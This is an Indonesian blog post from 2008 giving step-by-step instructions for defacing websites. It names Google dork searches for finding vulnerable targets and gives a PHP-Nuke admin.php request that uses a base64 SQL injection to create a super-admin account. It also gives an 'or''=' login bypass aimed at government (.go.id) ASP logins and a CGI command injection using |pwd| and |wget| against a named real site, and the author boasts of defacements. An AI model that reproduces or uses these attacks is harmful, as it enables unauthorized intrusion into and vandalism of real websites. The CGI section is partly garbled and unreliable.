Kamis, 07 Februari 2008

Langkah-Langkah Deface



Bagi Temen- yang pengen Belajar deface ni aku tunjukin cara2nya. tapi ntar kalo ada apa-apa nama gue jangan di bawa2 lho......

Deface situs php nuke

Buka situs www.google.com
kemudian ketik =>
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php =>
index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :

?op=AddAuthor&add_aid=zifoeproduction&add_name=
God&add_pwd=hacker&add_email=
ngapak@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=zifoeproduction&add_name=
God&add_pwd=hacker&add_email=
ngapak@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.target.com/nuke/admin.php?op=mod_author

5. Disana lu di suruh login, masukin id & password lu tadi.
Masih ingat kan ?
id=zifoeproduction => liat yg diatas tadi
password=hacker => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
Berarti lu udah mengusai situs tsb skrg !
ini adalah contoh situs yang berasil saya deface he..he...he....

=================================================================

deface asp dgn sql injection

1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target www.namatarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url lu

===============================================================
deface cgi

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/
web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl:*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target nya musti file html diujung nya kalo mau tambahin |pwd|

5.0
Agregar a facebook

Artikel Terkait:

0 komentar:

Poskan Komentar

 

Recent Comment

Pengikut